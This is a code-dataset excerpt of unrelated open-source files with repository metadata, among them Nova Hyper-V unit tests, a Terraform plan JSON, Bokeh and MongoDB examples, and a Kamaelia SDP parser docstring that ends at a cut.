self._vmutils._get_wmi_obj = mock.MagicMock(return_value=mock_job)
return mock_job
def test_add_virt_resource(self):
mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
getattr(mock_svc, self._ADD_RESOURCE).return_value = (
self._FAKE_JOB_PATH, mock.MagicMock(), self._FAKE_RET_VAL)
mock_res_setting_data = mock.MagicMock()
mock_res_setting_data.GetText_.return_value = self._FAKE_RES_DATA
self._vmutils._add_virt_resource(mock_res_setting_data,
self._FAKE_VM_PATH)
self._assert_add_resources(mock_svc)
def test_modify_virt_resource(self):
mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
mock_svc.ModifyVirtualSystemResources.return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
mock_res_setting_data = mock.MagicMock()
mock_res_setting_data.GetText_.return_value = self._FAKE_RES_DATA
self._vmutils._modify_virt_resource(mock_res_setting_data,
self._FAKE_VM_PATH)
mock_svc.ModifyVirtualSystemResources.assert_called_with(
ResourceSettingData=[self._FAKE_RES_DATA],
ComputerSystem=self._FAKE_VM_PATH)
def test_remove_virt_resource(self):
mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
getattr(mock_svc, self._REMOVE_RESOURCE).return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
mock_res_setting_data = mock.MagicMock()
mock_res_setting_data.path_.return_value = self._FAKE_RES_PATH
self._vmutils._remove_virt_resource(mock_res_setting_data,
self._FAKE_VM_PATH)
self._assert_remove_resources(mock_svc)
def test_set_disk_host_resource(self):
self._lookup_vm()
mock_rasds = self._create_mock_disks()
self._vmutils._get_vm_disks = mock.MagicMock(
return_value=([mock_rasds[0]], [mock_rasds[1]]))
self._vmutils._modify_virt_resource = mock.MagicMock()
self._vmutils._get_disk_resource_address = mock.MagicMock(
return_value=self._FAKE_ADDRESS)
self._vmutils.set_disk_host_resource(
self._FAKE_VM_NAME,
self._FAKE_CTRL_PATH,
self._FAKE_ADDRESS,
mock.sentinel.fake_new_mounted_disk_path)
self._vmutils._get_disk_resource_address.assert_called_with(
mock_rasds[0])
self._vmutils._modify_virt_resource.assert_called_with(
mock_rasds[0], self._FAKE_VM_PATH)
self.assertEqual(
mock.sentinel.fake_new_mounted_disk_path,
mock_rasds[0].HostResource[0])
@mock.patch.object(vmutils, 'wmi', create=True)
@mock.patch.object(vmutils.VMUtils, 'check_ret_val')
def test_take_vm_snapshot(self, mock_check_ret_val, mock_wmi):
self._lookup_vm()
mock_svc = self._get_snapshot_service()
mock_svc.CreateVirtualSystemSnapshot.return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL, mock.MagicMock())
self._vmutils.take_vm_snapshot(self._FAKE_VM_NAME)
mock_svc.CreateVirtualSystemSnapshot.assert_called_with(
self._FAKE_VM_PATH)
mock_check_ret_val.assert_called_once_with(self._FAKE_RET_VAL,
self._FAKE_JOB_PATH)
def test_remove_vm_snapshot(self):
mock_svc = self._get_snapshot_service()
getattr(mock_svc, self._DESTROY_SNAPSHOT).return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
self._vmutils.remove_vm_snapshot(self._FAKE_SNAPSHOT_PATH)
getattr(mock_svc, self._DESTROY_SNAPSHOT).assert_called_with(
self._FAKE_SNAPSHOT_PATH)
def test_detach_vm_disk(self):
self._lookup_vm()
mock_disk = self._prepare_mock_disk()
with mock.patch.object(self._vmutils,
'_remove_virt_resource') as mock_rm_virt_res:
self._vmutils.detach_vm_disk(self._FAKE_VM_NAME,
self._FAKE_HOST_RESOURCE)
mock_rm_virt_res.assert_called_with(mock_disk, self._FAKE_VM_PATH)
def _test_get_mounted_disk_resource_from_path(self, is_physical):
mock_disk_1 = mock.MagicMock()
mock_disk_2 = mock.MagicMock()
conn_attr = (self._vmutils._PHYS_DISK_CONNECTION_ATTR if is_physical
else self._vmutils._VIRT_DISK_CONNECTION_ATTR)
setattr(mock_disk_2, conn_attr, [self._FAKE_MOUNTED_DISK_PATH])
self._vmutils._conn.query.return_value = [mock_disk_1, mock_disk_2]
mounted_disk = self._vmutils._get_mounted_disk_resource_from_path(
self._FAKE_MOUNTED_DISK_PATH, is_physical)
self.assertEqual(mock_disk_2, mounted_disk)
def test_get_physical_mounted_disk_resource_from_path(self):
self._test_get_mounted_disk_resource_from_path(is_physical=True)
def test_get_virtual_mounted_disk_resource_from_path(self):
self._test_get_mounted_disk_resource_from_path(is_physical=False)
def test_get_controller_volume_paths(self):
self._prepare_mock_disk()
mock_disks = {self._FAKE_RES_PATH: self._FAKE_HOST_RESOURCE}
disks = self._vmutils.get_controller_volume_paths(self._FAKE_RES_PATH)
self.assertEqual(mock_disks, disks)
def _prepare_mock_disk(self):
mock_disk = mock.MagicMock()
mock_disk.HostResource = [self._FAKE_HOST_RESOURCE]
mock_disk.path.return_value.RelPath = self._FAKE_RES_PATH
mock_disk.ResourceSubType = self._vmutils._HARD_DISK_RES_SUB_TYPE
self._vmutils._conn.query.return_value = [mock_disk]
return mock_disk
def _get_snapshot_service(self):
return self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
def _assert_add_resources(self, mock_svc):
getattr(mock_svc, self._ADD_RESOURCE).assert_called_with(
[self._FAKE_RES_DATA], self._FAKE_VM_PATH)
def _assert_remove_resources(self, mock_svc):
getattr(mock_svc, self._REMOVE_RESOURCE).assert_called_with(
[self._FAKE_RES_PATH], self._FAKE_VM_PATH)
def test_get_active_instances(self):
fake_vm = mock.MagicMock()
type(fake_vm).ElementName = mock.PropertyMock(
side_effect=['active_vm', 'inactive_vm'])
type(fake_vm).EnabledState = mock.PropertyMock(
side_effect=[constants.HYPERV_VM_STATE_ENABLED,
constants.HYPERV_VM_STATE_DISABLED])
self._vmutils.list_instances = mock.MagicMock(
return_value=[mock.sentinel.fake_vm_name] * 2)
self._vmutils._lookup_vm = mock.MagicMock(side_effect=[fake_vm] * 2)
active_instances = self._vmutils.get_active_instances()
self.assertEqual(['active_vm'], active_instances)
def _test_get_vm_serial_port_connection(self, new_connection=None):
old_serial_connection = 'old_serial_connection'
mock_vm = self._lookup_vm()
mock_vmsettings = [mock.MagicMock()]
mock_vm.associators.return_value = mock_vmsettings
fake_serial_port = mock.MagicMock()
fake_serial_port.ResourceSubType = (
self._vmutils._SERIAL_PORT_RES_SUB_TYPE)
fake_serial_port.Connection = [old_serial_connection]
mock_rasds = [fake_serial_port]
mock_vmsettings[0].associators.return_value = mock_rasds
self._vmutils._modify_virt_resource = mock.MagicMock()
fake_modify = self._vmutils._modify_virt_resource
ret_val = self._vmutils.get_vm_serial_port_connection(
self._FAKE_VM_NAME, update_connection=new_connection)
mock_vmsettings[0].associators.assert_called_once_with(
wmi_result_class=self._vmutils._SERIAL_PORT_SETTING_DATA_CLASS)
if new_connection:
self.assertEqual(new_connection, ret_val)
fake_modify.assert_called_once_with(fake_serial_port,
mock_vm.path_())
else:
self.assertEqual(old_serial_connection, ret_val)
def test_set_vm_serial_port_connection(self):
self._test_get_vm_serial_port_connection('new_serial_connection')
def test_get_vm_serial_port_connection(self):
self._test_get_vm_serial_port_connection()
def test_list_instance_notes(self):
vs = mock.MagicMock()
attrs = {'ElementName': 'fake_name',
'Notes': '4f54fb69-d3a2-45b7-bb9b-b6e6b3d893b3'}
vs.configure_mock(**attrs)
vs2 = mock.MagicMock(ElementName='fake_name2', Notes=None)
self._vmutils._conn.Msvm_VirtualSystemSettingData.return_value = [vs,
vs2]
response = self._vmutils.list_instance_notes()
self.assertEqual([(attrs['ElementName'], [attrs['Notes']])], response)
self._vmutils._conn.Msvm_VirtualSystemSettingData.assert_called_with(
['ElementName', 'Notes'],
SettingType=self._vmutils._VIRTUAL_SYSTEM_CURRENT_SETTINGS)
@mock.patch('nova.virt.hyperv.vmutils.VMUtils.check_ret_val')
def test_modify_virtual_system(self, mock_check_ret_val):
mock_vs_man_svc = mock.MagicMock()
mock_vmsetting = mock.MagicMock()
fake_path = 'fake path'
fake_job_path = 'fake job path'
fake_ret_val = 'fake return value'
mock_vs_man_svc.ModifyVirtualSystem.return_value = (0, fake_job_path,
fake_ret_val)
self._vmutils._modify_virtual_system(vs_man_svc=mock_vs_man_svc,
vm_path=fake_path,
vmsetting=mock_vmsetting)
mock_vs_man_svc.ModifyVirtualSystem.assert_called_once_with(
ComputerSystem=fake_path,
SystemSettingData=mock_vmsetting.GetText_(1))
mock_check_ret_val.assert_called_once_with(fake_ret_val, fake_job_path)
@mock.patch('nova.virt.hyperv.vmutils.VMUtils.check_ret_val')
@mock.patch('nova.virt.hyperv.vmutils.VMUtils._get_wmi_obj')
@mock.patch('nova.virt.hyperv.vmutils.VMUtils._modify_virtual_system')
@mock.patch('nova.virt.hyperv.vmutils.VMUtils._get_vm_setting_data')
def test_create_vm_obj(self, mock_get_vm_setting_data,
mock_modify_virtual_system,
mock_get_wmi_obj, mock_check_ret_val):
mock_vs_man_svc = mock.MagicMock()
mock_vs_gs_data = mock.MagicMock()
fake_vm_path = 'fake vm path'
fake_job_path = 'fake job path'
fake_ret_val = 'fake return value'
_conn = self._vmutils._conn.Msvm_VirtualSystemGlobalSettingData
_conn.new.return_value = mock_vs_gs_data
mock_vs_man_svc.DefineVirtualSystem.return_value = (fake_vm_path,
fake_job_path,
fake_ret_val)
response = self._vmutils._create_vm_obj(
vs_man_svc=mock_vs_man_svc,
vm_name='fake vm', vm_gen='fake vm gen',
notes='fake notes', dynamic_memory_ratio=1.0,
instance_path=mock.sentinel.instance_path)
_conn.new.assert_called_once_with()
self.assertEqual(mock_vs_gs_data.ElementName, 'fake vm')
mock_vs_man_svc.DefineVirtualSystem.assert_called_once_with(
[], None, mock_vs_gs_data.GetText_(1))
mock_check_ret_val.assert_called_once_with(fake_ret_val, fake_job_path)
self.assertEqual(mock.sentinel.instance_path,
mock_vs_gs_data.ExternalDataRoot)
self.assertEqual(mock.sentinel.instance_path,
mock_vs_gs_data.SnapshotDataRoot)
mock_get_wmi_obj.assert_called_with(fake_vm_path)
mock_get_vm_setting_data.assert_called_once_with(mock_get_wmi_obj())
mock_modify_virtual_system.assert_called_once_with(
mock_vs_man_svc, fake_vm_path, mock_get_vm_setting_data())
self.assertEqual(mock_get_vm_setting_data().Notes,
'\n'.join('fake notes'))
self.assertEqual(response, mock_get_wmi_obj())
def test_list_instances(self):
vs = mock.MagicMock()
attrs = {'ElementName': 'fake_name'}
vs.configure_mock(**attrs)
self._vmutils._conn.Msvm_VirtualSystemSettingData.return_value = [vs]
response = self._vmutils.list_instances()
self.assertEqual([(attrs['ElementName'])], response)
self._vmutils._conn.Msvm_VirtualSystemSettingData.assert_called_with(
['ElementName'],
SettingType=self._vmutils._VIRTUAL_SYSTEM_CURRENT_SETTINGS)
@mock.patch.object(vmutils.VMUtils, "_clone_wmi_obj")
def _test_check_clone_wmi_obj(self, mock_clone_wmi_obj, clone_objects):
mock_obj = mock.MagicMock()
self._vmutils._clone_wmi_objs = clone_objects
response = self._vmutils._check_clone_wmi_obj(class_name="fakeClass",
obj=mock_obj)
if not clone_objects:
self.assertEqual(mock_obj, response)
else:
mock_clone_wmi_obj.assert_called_once_with("fakeClass", mock_obj)
self.assertEqual(mock_clone_wmi_obj.return_value, response)
def test_check_clone_wmi_obj_true(self):
self._test_check_clone_wmi_obj(clone_objects=True)
def test_check_clone_wmi_obj_false(self):
self._test_check_clone_wmi_obj(clone_objects=False)
def test_clone_wmi_obj(self):
mock_obj = mock.MagicMock()
mock_value = mock.MagicMock()
mock_value.Value = mock.sentinel.fake_value
mock_obj._properties = [mock.sentinel.property]
mock_obj.Properties_.Item.return_value = mock_value
response = self._vmutils._clone_wmi_obj(
class_name="FakeClass", obj=mock_obj)
compare = self._vmutils._conn.FakeClass.new()
self.assertEqual(mock.sentinel.fake_value,
compare.Properties_.Item().Value)
self.assertEqual(compare, response)
def test_get_attached_disks(self):
mock_scsi_ctrl_path = mock.MagicMock()
expected_query = ("SELECT * FROM %(class_name)s "
"WHERE (ResourceSubType='%(res_sub_type)s' OR "
"ResourceSubType='%(res_sub_type_virt)s')"
" AND Parent='%(parent)s'" %
{"class_name":
self._vmutils._RESOURCE_ALLOC_SETTING_DATA_CLASS,
"res_sub_type":
self._vmutils._PHYS_DISK_RES_SUB_TYPE,
"res_sub_type_virt":
self._vmutils._DISK_DRIVE_RES_SUB_TYPE,
"parent":
mock_scsi_ctrl_path.replace("'", "''")})
expected_disks = self._vmutils._conn.query.return_value
ret_disks = self._vmutils.get_attached_disks(mock_scsi_ctrl_path)
self._vmutils._conn.query.assert_called_once_with(expected_query)
self.assertEqual(expected_disks, ret_disks)
def _get_fake_instance_notes(self):
return self._FAKE_VM_UUID
def test_instance_notes(self):
self._lookup_vm()
mock_vm_settings = mock.Mock()
mock_vm_settings.Notes = self._get_fake_instance_notes()
self._vmutils._get_vm_setting_data = mock.Mock(
return_value=mock_vm_settings)
notes = self._vmutils._get_instance_notes(mock.sentinel.vm_name)
self.assertEqual(notes[0], self._FAKE_VM_UUID)
def test_get_event_wql_query(self):
cls = self._vmutils._COMPUTER_SYSTEM_CLASS
field = self._vmutils._VM_ENABLED_STATE_PROP
timeframe = 10
filtered_states = [constants.HYPERV_VM_STATE_ENABLED,
constants.HYPERV_VM_STATE_DISABLED]
expected_checks = ' OR '.join(
["TargetInstance.%s = '%s'" % (field, state)
for state in filtered_states])
expected_query = (
"SELECT %(field)s, TargetInstance "
"FROM __InstanceModificationEvent "
"WITHIN %(timeframe)s "
"WHERE TargetInstance ISA '%(class)s' "
"AND TargetInstance.%(field)s != "
"PreviousInstance.%(field)s "
"AND (%(checks)s)" %
{'class': cls,
'field': field,
'timeframe': timeframe,
'checks': expected_checks})
query = self._vmutils._get_event_wql_query(
cls=cls, field=field, timeframe=timeframe,
filtered_states=filtered_states)
self.assertEqual(expected_query, query)
def test_get_vm_power_state_change_listener(self):
with mock.patch.object(self._vmutils,
'_get_event_wql_query') as mock_get_query:
listener = self._vmutils.get_vm_power_state_change_listener(
mock.sentinel.timeframe,
mock.sentinel.filtered_states)
mock_get_query.assert_called_once_with(
cls=self._vmutils._COMPUTER_SYSTEM_CLASS,
field=self._vmutils._VM_ENABLED_STATE_PROP,
timeframe=mock.sentinel.timeframe,
filtered_states=mock.sentinel.filtered_states)
watcher = self._vmutils._conn.Msvm_ComputerSystem.watch_for
watcher.assert_called_once_with(
raw_wql=mock_get_query.return_value,
fields=[self._vmutils._VM_ENABLED_STATE_PROP])
self.assertEqual(watcher.return_value, listener)
|
unknown
|
codeparrot/codeparrot-clean
| ||
{
"applyable": true,
"complete": true,
"configuration": {
"provider_config": {
"tfcoremock": {
"full_name": "registry.terraform.io/hashicorp/tfcoremock",
"name": "tfcoremock",
"version_constraint": "0.1.1"
}
},
"root_module": {
"resources": [
{
"address": "tfcoremock_object.object",
"expressions": {
"id": {
"constant_value": "F40F2AB4-100C-4AE8-BFD0-BF332A158415"
},
"object": {
"constant_value": {
"id": "07F887E2-FDFF-4B2E-9BFB-B6AA4A05EDB9"
}
}
},
"mode": "managed",
"name": "object",
"provider_config_key": "tfcoremock",
"schema_version": 0,
"type": "tfcoremock_object"
}
]
}
},
"errored": false,
"format_version": "1.2",
"planned_values": {
"root_module": {
"resources": [
{
"address": "tfcoremock_object.object",
"mode": "managed",
"name": "object",
"provider_name": "registry.terraform.io/hashicorp/tfcoremock",
"schema_version": 0,
"sensitive_values": {
"object": {}
},
"type": "tfcoremock_object",
"values": {
"id": "F40F2AB4-100C-4AE8-BFD0-BF332A158415",
"object": {
"id": "07F887E2-FDFF-4B2E-9BFB-B6AA4A05EDB9"
}
}
}
]
}
},
"prior_state": {
"format_version": "1.0",
"values": {
"root_module": {
"resources": [
{
"address": "tfcoremock_object.object",
"mode": "managed",
"name": "object",
"provider_name": "registry.terraform.io/hashicorp/tfcoremock",
"schema_version": 0,
"sensitive_values": {
"object": {}
},
"type": "tfcoremock_object",
"values": {
"id": "F40F2AB4-100C-4AE8-BFD0-BF332A158415",
"object": {
"id": "56C7E07F-B9DF-4799-AF62-E703D1167A51"
}
}
}
]
}
}
},
"resource_changes": [
{
"action_reason": "replace_because_cannot_update",
"address": "tfcoremock_object.object",
"change": {
"actions": [
"delete",
"create"
],
"after": {
"id": "F40F2AB4-100C-4AE8-BFD0-BF332A158415",
"object": {
"id": "07F887E2-FDFF-4B2E-9BFB-B6AA4A05EDB9"
}
},
"after_sensitive": {
"object": {}
},
"after_unknown": {},
"before": {
"id": "F40F2AB4-100C-4AE8-BFD0-BF332A158415",
"object": {
"id": "56C7E07F-B9DF-4799-AF62-E703D1167A51"
}
},
"before_sensitive": {
"object": {}
},
"replace_paths": [
[
"object",
"id"
]
]
},
"mode": "managed",
"name": "object",
"provider_name": "registry.terraform.io/hashicorp/tfcoremock",
"type": "tfcoremock_object"
}
]
}
|
json
|
github
|
https://github.com/hashicorp/terraform
|
testing/equivalence-tests/outputs/replace_within_object/plan.json
|
# frozen_string_literal: true
class Organization < ActiveRecord::Base
has_many :member_details
has_many :members, through: :member_details
has_many :authors, primary_key: :name
has_many :author_essay_categories, through: :authors, source: :essay_categories
has_one :author, primary_key: :name
has_one :author_owned_essay_category, through: :author, source: :owned_essay_category
has_many :posts, through: :author, source: :posts
scope :clubs, -> { from("clubs") }
end
|
ruby
|
github
|
https://github.com/rails/rails
|
activerecord/test/models/organization.rb
|
#**************************************************************************
#* Copyright(c) 1998-2014, ALICE Experiment at CERN, All rights reserved. *
#* *
#* Author: The ALICE Off-line Project. *
#* Contributors are mentioned in the code where appropriate. *
#* *
#* Permission to use, copy, modify and distribute this software and its *
#* documentation strictly for non-commercial purposes is hereby granted *
#* without fee, provided that the above copyright notice appears in all *
#* copies and that both the copyright notice and this permission notice *
#* appear in the supporting documentation. The authors make no claims *
#* about the suitability of this software for any purpose. It is *
#* provided "as is" without express or implied warranty. *
#**************************************************************************
"""
Comparison plot for spectra in different pt-hat bins
@author: Markus Fasel
"""
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.Graphics import SinglePanelPlot, Style, GraphicsObject, Frame
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.ComparisonData import ComparisonPlot, ComparisonData, ComparisonObject
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.SpectraSum import SpectraSum
from ROOT import kBlack
class MCSpectrumPtHatBin(ComparisonObject):
"""
Entry class of a spectrum for a given pt-hat bin
"""
def __init__(self, pthatbin, spectrum, style = None):
"""
Constructor
"""
ComparisonObject.__init__(self, spectrum, style)
self.__pthatbin = pthatbin
def GetLegendTitle(self):
return "Pt-hat bin %d" %(self.__pthatbin)
def GetObjectName(self):
return "SpectrumPtHat%d" %(self.__pthatbin)
class MCSpectrumContainer(ComparisonData):
"""
Container class for spectra in different pt-hat bins
"""
def __init__(self):
"""
Constructor, initialising list of bins
"""
ComparisonData.__init__(self)
def AddPtHatBin(self, pthatbin, spectrum, style = None):
"""
Add new pt-hat bin to the container
"""
self.AddEntry(MCSpectrumPtHatBin(pthatbin, spectrum, style))
def GetSpectraSum(self):
"""
sum up the spectra in different pt-hard bins
"""
summer = SpectraSum()
for pthatbin in self.GetEntries():
summer.AddSpectrum(pthatbin.GetData())
return summer.GetSummedSpectrum()
def DrawObjects(self, pad, addtolegend = True):
"""
Draw all spectra inside the container into a given pad
"""
ComparisonData.DrawObjects(self, pad, addtolegend)
# draw also sum of the different bins
pad.DrawGraphicsObject(GraphicsObject(self.GetSpectraSum(), Style(kBlack, 20)), addtolegend, "Sum")
class WeightedPtSpectrumFrame(Frame):
def __init__(self):
Frame.__init__(self, "sframe", 0., 100., 1e-20, 1e-5)
self.SetXtitle("p_{t} (GeV/c)")
self.SetYtitle("d#sigma/dp_{t} (mb/(GeV/c))" )
class WeightedEnergySpectrumFrame(Frame):
def __init__(self):
Frame.__init__(self, "eframe", 0., 100., 1e-20, 1e-5)
self.SetXtitle("E (GeV)")
self.SetYtitle("d#sigma/dE (mb/GeV)" )
class MCSpectrumPlot(ComparisonPlot):
"""
Comparison plot of spectra for different pt-hat bins
"""
def __init__(self, plottype = "tracks"):
"""
Constructor
"""
ComparisonPlot.__init__(self)
self._comparisonContainer = MCSpectrumContainer()
self._canvasname = ""
self._canvastitle = ""
self.__labeltext = "MC-true spectrum"
if plottype == "tracks":
self.SetFrame(WeightedPtSpectrumFrame())
else:
self.SetFrame(WeightedEnergySpectrumFrame())
def SetLabelText(self, text):
"""
Change text of the label
"""
self.__labeltext = text
def AddMCSpectrum(self, pthatbin, spectrum, style = None):
"""
Add new spectrum in pt-hat bin to the plot
"""
self._comparisonContainer.AddPtHatBin(pthatbin, spectrum, style)
def Create(self):
"""
Create the plot
"""
self.SetPadAttributes(True, True, False, False)
self.SetLegendAttributes(0.7, 0.5, 0.89, 0.89)
self._Create(self._canvasname, self._canvastitle)
pad = self._GetFramedPad()
pad.DrawLabel(0.15, 0.15, 0.45, 0.21, self.__labeltext)
class MCTrueSpectrumPlot(MCSpectrumPlot):
def __init__(self, plottype = "tracks"):
MCSpectrumPlot.__init__(self, plottype)
self._canvasname = "MCtruthPlot"
self._canvastitle = "Plot of MC-true spectra"
self.SetLabelText("MC-true spectrum")
class MCRecSpectrumPlot(MCSpectrumPlot):
def __init__(self, triggername, plottype = "tracks"):
MCSpectrumPlot.__init__(self)
self._canvasname = "MCrecPlot%s" %(triggername)
self._canvastitle = "Plot of MC-reconstructed spectra for trigger %s" %(triggername)
self.SetLabelText("MC-reconstructed spectrum for trigger %s" %(triggername))
class MCWeightPlot(SinglePanelPlot):
"""
Class for the plot of the weights for different pt-hard bins
"""
def __init__(self, weights):
"""
Constructor
"""
SinglePanelPlot.__init__(self)
self.__points = weights
def Create(self):
"""
Creator function for the plot
"""
self._OpenCanvas("weightplot", "Monte-Carlo weights")
pad = self._GetFramedPad()
pad.GetPad().SetLogy()
frame = Frame("wframe", 0., 11., 1e-12, 1e-5)
frame.SetXtitle("p_{t,hard} bin")
frame.SetYtitle("weight factor")
pad.DrawFrame(frame)
pad.DrawGraphicsObject(GraphicsObject(self.__points.GetWeightingCurve(), Style(kBlack, 20)), False, "weights")
|
unknown
|
codeparrot/codeparrot-clean
| ||
// Copyright (c) HashiCorp, Inc.
// SPDX-License-Identifier: BUSL-1.1
package promising
type ptrSet[T any] map[*T]struct{}
func (s ptrSet[T]) Add(p *T) {
s[p] = struct{}{}
}
func (s ptrSet[T]) Remove(p *T) {
delete(s, p)
}
func (s ptrSet[T]) Has(p *T) bool {
_, ret := s[p]
return ret
}
type promiseSet = ptrSet[promise]
|
go
|
github
|
https://github.com/hashicorp/terraform
|
internal/promising/ptr_set.go
|
from bokeh.models import StaticLayoutProvider, ColumnDataSource, HoverTool, TapTool
from bokeh.models.graphs import NodesAndLinkedEdges
from bokeh.palettes import Set3_12
from bokeh.plotting import figure, show, output_file
from bokeh.sampledata.us_states import data as us_states
from bokeh.sampledata.airport_routes import airports, routes
import numpy as np
output_file("graphs.html")
airports.set_index("AirportID", inplace=True)
airports.index.rename("index", inplace=True)
routes.rename(columns={"SourceID": "start", "DestinationID": "end"}, inplace=True)
lats, lons = [], []
for k, v in us_states.items():
lats.append(np.array(v['lats']))
lons.append(np.array(v['lons']))
source = ColumnDataSource(data=dict(lats=lats, lons=lons))
graph_layout = dict(zip(airports.index.astype(str), zip(airports.Longitude, airports.Latitude)))
layout_provider = StaticLayoutProvider(graph_layout=graph_layout)
fig = figure(x_range=(-180, -60), y_range=(15,75),
x_axis_label="Longitude", y_axis_label="Latitude",
plot_width=800, plot_height=600, background_fill_color=Set3_12[4],
background_fill_alpha=0.2, tools='box_zoom,reset')
fig.patches(xs="lons", ys="lats", line_color='grey', line_width=1.0,
fill_color=Set3_12[10], source=source)
r = fig.graph(airports, routes, layout_provider,
## node style props
node_fill_color=Set3_12[3], node_fill_alpha=0.4, node_line_color="black", node_line_alpha=0.3,
node_nonselection_fill_color=Set3_12[3], node_nonselection_fill_alpha=0.2, node_nonselection_line_alpha=0.1,
node_selection_fill_color=Set3_12[3], node_selection_fill_alpha=0.8, node_selection_line_alpha=0.3,
## edge style props
edge_line_color="black", edge_line_alpha=0.04,
edge_hover_line_alpha=0.6, edge_hover_line_color=Set3_12[1],
edge_nonselection_line_color="black", edge_nonselection_line_alpha=0.01,
edge_selection_line_alpha=0.6, edge_selection_line_color=Set3_12[1],
## graph policies
inspection_policy=NodesAndLinkedEdges(), selection_policy=NodesAndLinkedEdges())
hover = HoverTool(tooltips=[("Airport", "@Name (@IATA), @City ")], renderers=[r])
tap = TapTool(renderers=[r])
fig.add_tools(hover, tap)
show(fig)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
"""
In an earlier exercise we looked at the cities dataset and asked which region in India contains
the most cities. In this exercise, we'd like you to answer a related question regarding regions in
India. What is the average city population for a region in India? Calculate your answer by first
finding the average population of cities in each region and then by calculating the average of the
regional averages.
Hint: If you want to accumulate using values from all input documents to a group stage, you may use
a constant as the value of the "_id" field. For example,
{ "$group" : "India Regional City Population Average",
... }
Please modify only the 'make_pipeline' function so that it creates and returns an aggregation
pipeline that can be passed to the MongoDB aggregate function. As in our examples in this lesson,
the aggregation pipeline should be a list of one or more dictionary objects.
Please review the lesson examples if you are unsure of the syntax.
Your code will be run against a MongoDB instance that we have provided. If you want to run this code
locally on your machine, you have to install MongoDB, download and insert the dataset.
For instructions related to MongoDB setup and datasets please see Course Materials.
Please note that the dataset you are using here is a smaller version of the twitter dataset used
in examples in this lesson. If you attempt some of the same queries that we looked at in the lesson
examples, your results will be different.
"""
def get_db(db_name):
from pymongo import MongoClient
client = MongoClient('localhost:27017')
db = client[db_name]
return db
def make_pipeline():
# complete the aggregation pipeline
pipeline = [{"$match": {"country": "India"}},
{"$unwind": "$isPartOf"},
{"$group": {"_id": "$isPartOf", "avg": {"$avg": "$population"}}},
{"$group": {"_id": "avg", "avg": {"$avg": "$avg"}}}]
return pipeline
def aggregate(db, pipeline):
result = db.cities.aggregate(pipeline)
return result
if __name__ == '__main__':
db = get_db('examples')
pipeline = make_pipeline()
result = aggregate(db, pipeline)
assert len(result["result"]) == 1
assert result["result"][0]["avg"] == 196025.97814809752
import pprint
pprint.pprint(result)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test.test_support import run_unittest, have_unicode
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
def test_no_overflow(self):
nines = "9" * 32
self.assert_(eval("+" + nines) == eval("+" + nines + "L"))
self.assert_(eval("-" + nines) == eval("-" + nines + "L"))
self.assert_(eval("~" + nines) == eval("~" + nines + "L"))
def test_negation_of_exponentiation(self):
# Make sure '**' does the right thing; these form a
# regression test for SourceForge bug #456756.
self.assertEqual(-2 ** 3, -8)
self.assertEqual((-2) ** 3, -8)
self.assertEqual(-2 ** 4, -16)
self.assertEqual((-2) ** 4, 16)
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
if have_unicode:
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
def test_main():
run_unittest(UnaryOpTestCase)
if __name__ == "__main__":
test_main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
"""\
==========================================
Session Description Protocol (SDP) Support
==========================================
The SDPParser component parses Session Description Protocol (see `RFC 4566`_) data
sent to it as individual lines of text (not multiline strings) and outputs a
dictionary containing the parsed session description.
.. _`RFC 4566`: http://tools.ietf.org/html/rfc4566
Example Usage
-------------
Fetch SDP data from a URL, parse it, and display the output::
Pipeline( OneShot("http://www.mysite.com/sessiondescription.sdp"),
SimpleHTTPClient(),
chunks_to_lines(),
SDPParser(),
ConsoleEchoer(),
).run()
If the session description at the URL provided is this::
v=0
o=jdoe 2890844526 2890842807 IN IP4 10.47.16.5
s=SDP Seminar
i=A Seminar on the session description protocol
u=http://www.example.com/seminars/sdp.pdf
e=j.doe@example.com (Jane Doe)
c=IN IP4 224.2.17.12/127
t=2873397496 2873404696
a=recvonly
m=audio 49170 RTP/AVP 0
m=video 51372 RTP/AVP 99
a=rtpmap:99 h263-1998/90000
Then parsing will return this dictionary::
{ 'protocol_version': 0,
'origin' : ('jdoe', 2890844526, 2890842807, 'IN', 'IP4', '10.47.16.5'),
'sessionname': 'SDP Seminar',
'information': 'A Seminar on the session description protocol',
'connection' : ('IN', 'IP4', '224.2.17.12', '127', 1),
